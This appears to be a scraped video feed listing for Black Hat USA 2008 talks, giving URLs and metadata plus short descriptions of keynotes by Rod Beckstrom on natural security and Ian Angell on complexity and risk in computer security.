https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Rutkowska Computer 30122A3C-E4DC-4A55-98F3-455AC4D26826-22589-0002820996C063D7-FFA Sun, 15 Mar 2009 21:36:30 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Rutkowska/black-hat-usa-08-rutkowska-xensubversions-hires.m4v 57:00 Black Hat, Rutkowska, Xen Hypervisor, Wojtczuk no
Black Hat USA 2008 Keynote Day 2: Rod Beckstrom - Natural Security
Rod Beckström is the Director of the National Cyber Security Center (NCSC) in the U.S. Department of Homeland Security and reports to Secretary Michael Chertoff.
Rod co-authored The Starfish and the Spider: The Unstoppable Power of Leaderless Organizations, which presents a new model for analyzing organizations, leadership style and competitive strategy. He has co-authored three other books, including one on Value at Risk (VAR), a fundamental theory of financial risk management now used to regulate banking globally.
http://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Beckstrom Computer 8F6CD2FA-0AE3-4CF7-A9A4-2838E1073780-1613-0000663F1021E990-FFA Sun, 15 Mar 2009 21:36:40 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Beckstrom/black-hat-usa-08-beckstrom-keynote-hires.m4v 52:00 no
Black Hat USA 2008 Keynote: Ian Angell - Complexity in Computer Security: a Risky Business
In this talk Professor Angell will take the devil’s advocate position, warning that computer technology is part of the problem as well as of the solution. The belief system at the core of computerization is positivist and/or statistical, and that itself leads to risk. The mixture of computers and human activity systems spawns bureaucracy and systemic risk, which can throw up singularities that defy any positivist/statistical analysis. Using black humour, Angell discusses the thin line between the utility of computers and the hazard of chaotic feedback, and ends with some advice on how to survive and prosper amongst all this complexity.
http://blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Angell Computer 351DF236-D32E-44AC-A162-1AA541D2B467-1613-00005E1561F82042-FFA Sun, 15 Mar 2009 21:36:54 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Angell/black-hat-usa-08-angell-keynote-hires.m4v 55:49 security, complexity, Black Hat, keynote, risk management, technology Ian O. Angell no